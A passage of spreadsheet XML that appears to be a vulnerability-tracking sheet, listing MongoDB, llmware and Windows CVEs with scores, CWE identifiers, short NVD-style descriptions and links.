          <t>CVE-2026-82073</t>
        </is>
      </c>
      <c r="D288" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E288" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F288" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G288" s="5" t="inlineStr"/>
      <c r="H288" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I288" s="5" t="inlineStr"/>
      <c r="J288" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K288" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L288" s="5" t="inlineStr"/>
      <c r="M288" s="5" t="inlineStr"/>
      <c r="N288" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O288" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P288" s="5" t="inlineStr"/>
      <c r="Q288" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R288" s="5" t="inlineStr">
        <is>
          <t>A security issue in the MongoDB Server aggregation framework allows an authenticated user with limited read privileges to bypass view-level authorization checks and access data from unauthorized collections when Atlas Search features are in use. The issue stems from insufficient validation of an internal command parameter that can be set by external clients, causing a security check to be improperly skipped.</t>
        </is>
      </c>
      <c r="S288" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82073</t>
        </is>
      </c>
    </row>
    <row r="289">
      <c r="A289" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B289" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C289" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82074</t>
        </is>
      </c>
      <c r="D289" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E289" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F289" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G289" s="5" t="inlineStr"/>
      <c r="H289" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I289" s="5" t="inlineStr"/>
      <c r="J289" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K289" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L289" s="5" t="inlineStr"/>
      <c r="M289" s="5" t="inlineStr"/>
      <c r="N289" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O289" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P289" s="5" t="inlineStr"/>
      <c r="Q289" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R289" s="5" t="inlineStr">
        <is>
          <t>MongoDB Server contains an incorrect authorization vulnerability in the aggregation framework. An authenticated user with minimal privileges can craft a specially formatted aggregation request that causes the server's authorization subsystem to evaluate a different operation than what is actually executed, resulting in unauthorized read access to collection data within the target database.</t>
        </is>
      </c>
      <c r="S289" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82074</t>
        </is>
      </c>
    </row>
    <row r="290">
      <c r="A290" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B290" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C290" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82076</t>
        </is>
      </c>
      <c r="D290" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E290" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F290" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G290" s="5" t="inlineStr"/>
      <c r="H290" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I290" s="5" t="inlineStr"/>
      <c r="J290" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K290" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L290" s="5" t="inlineStr"/>
      <c r="M290" s="5" t="inlineStr"/>
      <c r="N290" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O290" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P290" s="5" t="inlineStr"/>
      <c r="Q290" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R290" s="5" t="inlineStr">
        <is>
          <t>An integer overflow in the query planning component of MongoDB Server can allow an authenticated user with ordinary database-level read/write privileges to bypass an internal resource limit. Submitting a specially crafted query causes the server to consume memory without bound during query planning, and the resulting exhaustion terminates the server process. This may result in a denial of service affecting all databases served by the affected node.</t>
        </is>
      </c>
      <c r="S290" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82076</t>
        </is>
      </c>
    </row>
    <row r="291">
      <c r="A291" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B291" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C291" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85689</t>
        </is>
      </c>
      <c r="D291" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E291" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F291" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G291" s="5" t="inlineStr"/>
      <c r="H291" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I291" s="5" t="inlineStr"/>
      <c r="J291" s="5" t="inlineStr">
        <is>
          <t>postgresql</t>
        </is>
      </c>
      <c r="K291" s="5" t="inlineStr"/>
      <c r="L291" s="5" t="inlineStr"/>
      <c r="M291" s="5" t="inlineStr"/>
      <c r="N291" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O291" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P291" s="5" t="inlineStr"/>
      <c r="Q291" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R291" s="5" t="inlineStr">
        <is>
          <t>llmware 0.4.6 contains an SQL injection vulnerability in the collection-database layer (llmware/resources.py) where filter and lookup values are directly string-interpolated into SQL WHERE clauses without parameterization or escaping, in both the SQLite and PostgreSQL backends. The filter validator only checks keys against an allow-list and never sanitizes values. Attacker-controlled filter values reaching the public API via Library.block_lookup and Query.text_query_with_custom_filter / text_query_by_author_or_speaker can neutralize the intended filter to disclose rows the caller was scoped out of (cross-document/cross-collection disclosure); on PostgreSQL the flaw permits boolean- and UNION-based SQL injection.</t>
        </is>
      </c>
      <c r="S291" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85689</t>
        </is>
      </c>
    </row>
    <row r="292">
      <c r="A292" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B292" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C292" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62727</t>
        </is>
      </c>
      <c r="D292" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E292" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F292" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G292" s="5" t="inlineStr"/>
      <c r="H292" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I292" s="5" t="inlineStr"/>
      <c r="J292" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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2" s="5" t="inlineStr"/>
      <c r="M292" s="5" t="inlineStr"/>
      <c r="N292" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O292" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="P292" s="5" t="inlineStr"/>
      <c r="Q292" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="R292" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Telephony Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S292" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62727</t>
        </is>
      </c>
    </row>
    <row r="293">
      <c r="A293" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B293" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C293" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68840</t>
        </is>
      </c>
      <c r="D293" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E293" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F293" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G293" s="5" t="inlineStr"/>
      <c r="H293" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I293" s="5" t="inlineStr"/>
      <c r="J293" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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3" s="5" t="inlineStr"/>
      <c r="M293" s="5" t="inlineStr"/>
      <c r="N293" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O293" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P293" s="5" t="inlineStr"/>
      <c r="Q293" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-416</t>
        </is>
      </c>
      <c r="R293" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows USB Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S293" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68840</t>
        </is>
      </c>
    </row>
    <row r="294">
      <c r="A294" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B294" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C294" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68884</t>
        </is>
      </c>
      <c r="D294" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E294" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F294" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G294" s="5" t="inlineStr"/>
      <c r="H294" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I294" s="5" t="inlineStr"/>
      <c r="J294" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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294" s="5" t="inlineStr"/>
      <c r="M294" s="5" t="inlineStr"/>
      <c r="N294" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O294" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P294" s="5" t="inlineStr"/>
      <c r="Q294" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R294" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Kernel allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S294" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68884</t>
        </is>
      </c>
    </row>
    <row r="295">
      <c r="A295" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B295" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C295" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69287</t>
        </is>
      </c>
      <c r="D295" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E295" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F295" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G295" s="5" t="inlineStr"/>
      <c r="H295" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I295" s="5" t="inlineStr"/>
      <c r="J295" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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5" s="5" t="inlineStr"/>
      <c r="M295" s="5" t="inlineStr"/>
      <c r="N295" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O295" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P295" s="5" t="inlineStr"/>
      <c r="Q295" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R295" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Remote Desktop Services allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S295" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69287</t>
        </is>
      </c>
    </row>
    <row r="296">
      <c r="A296" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B296" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C296" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69319</t>
        </is>
      </c>
      <c r="D296" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E296" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F296" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G296" s="5" t="inlineStr"/>
      <c r="H296" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I296" s="5" t="inlineStr"/>
      <c r="J296" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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6" s="5" t="inlineStr"/>
      <c r="M296" s="5" t="inlineStr"/>
      <c r="N296" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O296" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P296" s="5" t="inlineStr"/>
      <c r="Q296" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-416</t>
        </is>
      </c>
      <c r="R296" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows USB Video Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S296" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69319</t>
        </is>
      </c>
    </row>
    <row r="297">
      <c r="A297" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B297" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C297" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69379</t>
        </is>
      </c>
      <c r="D297" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E297" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F297" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G297" s="5" t="inlineStr"/>
      <c r="H297" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I297" s="5" t="inlineStr"/>
      <c r="J297" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K297" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L297" s="5" t="inlineStr"/>
      <c r="M297" s="5" t="inlineStr"/>
      <c r="N297" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O297" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P297" s="5" t="inlineStr"/>
      <c r="Q297" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="R297" s="5" t="inlineStr">
        <is>
          <t>Improper link resolution before file access ('link following') in Windows NTFS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S297" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69379</t>
        </is>
      </c>
    </row>
    <row r="298">
      <c r="A298" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B298" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C298" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69413</t>
        </is>
      </c>
      <c r="D298" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E298" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F298" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G298" s="5" t="inlineStr"/>
      <c r="H298" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I298" s="5" t="inlineStr"/>
      <c r="J298" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K29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98" s="5" t="inlineStr"/>
      <c r="M298" s="5" t="inlineStr"/>
      <c r="N298" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O298" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P298" s="5" t="inlineStr"/>
      <c r="Q298" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R298" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S298" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69413</t>
        </is>
      </c>
    </row>
    <row r="299">
      <c r="A299" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B299" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C299" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69422</t>
        </is>
      </c>
      <c r="D299" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E299" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F299" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G299" s="5" t="inlineStr"/>
      <c r="H299" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I299" s="5" t="inlineStr"/>
      <c r="J299" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K299" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L299" s="5" t="inlineStr"/>
      <c r="M299" s="5" t="inlineStr"/>
      <c r="N299" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O299" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P299" s="5" t="inlineStr"/>
      <c r="Q299" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R299" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows USB Video Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S299" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69422</t>
        </is>
      </c>
    </row>
    <row r="300">
      <c r="A300" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B300" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C300" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69466</t>
        </is>
      </c>
      <c r="D300" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E300" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F300" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G300" s="5" t="inlineStr"/>
      <c r="H300" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I300" s="5" t="inlineStr"/>
      <c r="J300" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K30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0" s="5" t="inlineStr"/>
      <c r="M300" s="5" t="inlineStr"/>
      <c r="N300" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O300" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P300" s="5" t="inlineStr"/>
      <c r="Q300" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="R300" s="5" t="inlineStr">
        <is>
          <t>Time-of-ch</t>
        </is>
      </c>
      <c r="S300" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69466</t>
        </is>
      </c>
    </row>
    <row r="301">
      <c r="A301" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B301" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C301" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69473</t>
        </is>
      </c>
      <c r="D301" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E301" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F301" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G301" s="5" t="inlineStr"/>
      <c r="H301" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I301" s="5" t="inlineStr"/>
      <c r="J301" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K30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1" s="5" t="inlineStr"/>
      <c r="M301" s="5" t="inlineStr"/>
      <c r="N301" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O301" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P301" s="5" t="inlineStr"/>
      <c r="Q301" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R301" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Kernel allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S301" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69473</t>
        </is>
      </c>
    </row>
    <row r="302">
      <c r="A302" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B302" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C302" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69501</t>
        </is>
      </c>
      <c r="D302" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E302" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F302" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G302" s="5" t="inlineStr"/>
      <c r="H302" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I302" s="5" t="inlineStr"/>
      <c r="J302" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K302" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L302" s="5" t="inlineStr"/>
      <c r="M302" s="5" t="inlineStr"/>
      <c r="N302" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O302" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P302" s="5" t="inlineStr"/>
      <c r="Q302" s="5" t="inlineStr">
        <is>
          <t>CWE-822</t>
        </is>
      </c>
      <c r="R302" s="5" t="inlineStr">
        <is>
          <t>Untrusted pointer dereference in Windows Secure Kernel Mode allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S302" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69501</t>
        </is>
      </c>
    </row>
    <row r="303">
      <c r="A303" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B303" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C303" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69567</t>
        </is>
      </c>
      <c r="D303" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E303" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F303" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G303" s="5" t="inlineStr"/>
      <c r="H303" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I303" s="5" t="inlineStr"/>
      <c r="J303" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K30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3" s="5" t="inlineStr"/>
      <c r="M303" s="5" t="inlineStr"/>
      <c r="N303" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O303" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P303" s="5" t="inlineStr"/>
      <c r="Q303" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R303" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows NTFS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S303" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69567</t>
        </is>
      </c>
    </row>
    <row r="304">
      <c r="A304" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B304" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C304" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69578</t>
        </is>
      </c>
      <c r="D304" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E304" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F304" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G304" s="5" t="inlineStr"/>
      <c r="H304" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I304" s="5" t="inlineStr"/>
      <c r="J304" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K30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4" s="5" t="inlineStr"/>
      <c r="M304" s="5" t="inlineStr"/>
      <c r="N304" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O304" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P304" s="5" t="inlineStr"/>
      <c r="Q304" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-197</t>
        </is>
      </c>
      <c r="R304" s="5" t="inlineStr">
        <is>
          <t>Numeric truncation error in Windows Kernel allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S304" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69578</t>
        </is>
      </c>
    </row>
    <row r="305">
      <c r="A305" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B305" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C305" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69814</t>
        </is>
      </c>
      <c r="D305" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E305" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F305" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G305" s="5" t="inlineStr"/>
      <c r="H305" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I305" s="5" t="inlineStr"/>
      <c r="J305" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K305" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L305" s="5" t="inlineStr"/>
